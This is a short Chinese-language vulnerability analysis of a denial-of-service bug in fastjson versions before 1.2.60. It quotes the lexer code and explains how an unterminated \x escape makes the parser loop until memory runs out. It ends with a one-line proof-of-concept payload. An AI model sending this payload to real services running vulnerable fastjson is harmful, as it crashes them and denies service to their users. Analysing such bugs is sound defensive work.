Fastjson<1.2.60 Dos分析

fastjson<1.2.60

发现

https://github.com/alibaba/fastjson/commit/995845170527221ca0293cf290e33a7d6cb52bf7

分析

问题出现在
src/main/java/com/alibaba/fastjson/parser/JSONLexerBase.java

    public final void scanString() {
        np = bp;
        hasSpecial = false;
        char ch;
        for (;;) {
            ch = next();

            if (ch == '\"') {
                break;
            }

            if (ch == EOI) {
                if (!isEOF()) {
                    putChar((char) EOI);
                    continue;
                }
                throw new JSONException("unclosed string : " + ch);
            }

...

                    case 'x':
                        char x1 = ch = next();
                        char x2 = ch = next();

                        int x_val = digits[x1] * 16 + digits[x2];
                        char x_char = (char) x_val;
                        putChar(x_char);
                        break;                    
...

问题产生很简单，解析十六进制时出问题了

正常的\x十六进制写法应该是

[{"a":"a\xAA"}]

x1 = A

x2 = A

如果这么写呢

[{"a":"a\x]

x1 = ]

x2 = EOI

这个时候已经读完了，但是看看判断是否读完的isEOF实现：

public boolean isEOF() {
    return bp == len || ch == EOI && bp + 1 == len;
}

ch=EOI，只是这时候指针bp已经在max len之后一位了，isEOF 永为false

所有会一直putChar((char) EOI)，直到产生OOM

POC

import com.alibaba.fastjson.JSON;
decodeLog = "[{\"a\":\"a\\x]"
System.out.println(decodeLog);
Object obj = JSON.parse(decodeLog);